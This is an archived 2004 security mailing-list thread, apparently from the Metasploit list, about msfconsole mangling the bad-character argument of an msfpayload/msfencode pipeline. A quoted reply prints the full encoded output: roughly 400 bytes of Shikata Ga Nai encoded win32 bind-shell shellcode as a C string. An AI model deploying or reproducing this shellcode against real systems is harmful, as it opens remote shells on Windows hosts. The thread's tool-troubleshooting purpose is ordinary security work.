msfpayload and msfencode problems

[ninjatools at hush.com (ninjatools at hush.com)]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Yeah, so msf console does argument parsing like a shell would (well,
not quite the same, some sort of ghetto crap I wrote.. anyway).

So like....

msf > setg "waka waka robot" foo
waka waka robot -> foo

and it also does parsing of \ stuff, so you can do like

msf > setg "waka \" waka robot" foo
waka " waka robot -> foo

So yeah, that's probably why it's breaking stuff.... don't call it from
inside of msfconsole like matt suggested.

- -spoon

On Wed, 20 Oct 2004 08:13:20 -0700 mmiller at hick.org wrote:
> On Wed, Oct 20, 2004 at 04:51:44PM +0200, sol seclists wrote:
> > Having some problems with msfpayload and msfencode....
> >
> > msf > msfpayload win32_bind R | msfencode -t c -e ShikataGaNai
> -b "\x00"
> > [*] Bad character list format is "\x00\x01\x02"
> > msf > msfpayload win32_bind R | msfencode -t c -e ShikataGaNai
> -b \x00
> > [*] Bad character list format is "\x00\x01\x02"
> > msf > msfpayload win32_bind R | msfencode -t c -e ShikataGaNai
> -b '\x00'
> > [*] Bad character list format is "\x00\x01\x02"
> > msf > msfpayload win32_bind R | msfencode -t c -e ShikataGaNai
> -b "\x00\x01\x02"
> > [*] Bad character list format is "\x00\x01\x02"
> > msf >
>
> My guess is that this has something to do with the fact that you're
> executing this from inside msfconsole (judging from your command
> prompt).
>
> $ ./msfpayload win32_bind R | ./msfencode -t c -e ShikataGaNai -
> b '\x00\x0d\x0a\x7e'
> [*] Using Msf::Encoder::ShikataGaNai with final size of 402 bytes
> "\xdb\xd2\xbe\x26\x3f\x8f\xfd\x2b\xc9\xb1\x5f\xd9\x74\x24\xf4\x5b"
> "\x83\xc3\x04\x31\x73\x13\x03\x55\x2c\x6d\x08\x65\xba\x27\xf3\x95"
> "\x3b\x9b\xa6\xc3\x6c\x90\x25\xcf\x8a\x2d\xf0\x33\x20\x65\xfe\x33"
> "\x37\x6c\x8b\x89\x2f\xfb\xd6\x2d\x51\x10\x05\x1f\x18\x6d\xfe\xd4"
> "\x9b\x9f\xce\x15\x67\x6e\xf1\x45\xa0\x71\x85\x92\x10\xbe\x6b\x9d"
> "\x55\xaa\x86\xa6\x25\x09\x73\xad\x34\xda\x21\x69\xb6\x36\xb3\xfa"
> "\xb4\x83\xb7\xa6\xd8\x12\x23\xdd\xe5\x9f\xb2\x09\x0e\x9d\x85\x09"
> "\x8e\xfc\xb8\xd2\xf3\x09\x43\xba\x99\x39\x1a\x26\xd5\x23\x17\xfd"
> "\xe5\xd8\x7c\x1d\x7d\xc5\x09\x46\x89\xa9\x65\xf6\xc7\x43\x9a\xf9"
> "\x0e\xd2\xa5\x84\x43\xe5\x28\x86\x9b\xb1\x7c\xd5\x12\xd8\x69\xfe"
> "\x24\x23\x6a\x90\x24\x23\x6a\x26\x3f\x3b\x8d\xe2\x59\x4b\xb8\x0f"
> "\x10\x2d\x73\x6b\xb9\x41\x43\xd7\x13\x8f\xa2\xce\x65\x25\x99\x3b"
> "\x98\x39\xd9\xec\x30\xf0\x41\x21\x85\xf4\x26\xc8\xa2\xd4\x89\x2d"
> "\xe3\x9c\xf5\x58\xcf\x12\x7c\x4e\xba\x2b\x26\x3f\x69\xcb\xec\x30"
> "\x72\x66\x09\x17\x04\x8d\x9f\x45\xe4\xa5\xb8\xdd\xf6\x8d\x39\x88"
> "\x38\xc3\x05\x62\x69\x73\xd6\xc2\xd9\x33\x86\x3d\x8c\x9f\xaf\x06"
> "\x1e\x3b\xfc\xdb\x09\xb9\x03\xca\x95\x34\xe3\x86\x35\x17\xb3\xa9"
> "\x63\xb3\x68\x02\x73\xee\xa6\xff\xdf\x46\x48\xaa\xff\xe1\x71\x3c"
> "\x43\xbf\x39\xbc\xca\xdc\x45\x46\xfd\xe2\xc7\xca\xda\x4e\xbd\x27"
> "\x7a\x7c\xe9\xc0\x86\x01\x02\x9a\xb0\x42\xff\x32\x79\x2d\x38\x76"
> "\xa5\x8d\xc7\x77\x2c\x91\xe3\x3f\xa7\x16\xc8\xf3\x3e\x9a\x34\x5b"
> "\xcc\x27\x11\x4b\x9a\xf7\x08\x3a\x73\xb9\xfb\xf5\x22\x68\xaf\x54"
> "\x3a\xff\x4f\x3e\xb6\xfe\xe3\xa8\xc9\xaa\x07\x2b\xe5\xdc\xee\x2c"
> "\x73\xdf\x86\x7f\xa5\xda\x98\x80\x03\xe1\xad\xbd\xc6\x16\x52\x77"
> "\xe8\x3a\x52\x02\x16\xd5\x5d\x66\x12\x7a\x61\x23\x1f\xb5\x46\x98"
> "\xe0\x65";
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkF3NZcACgkQtCeTLzI39eN+lQCeMfi4pQSbgP23NQf5wef2fGOoLWAA
n2w9ukP1XdjIT2VqkyjN5Qj/xa7Y
=ipyH
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427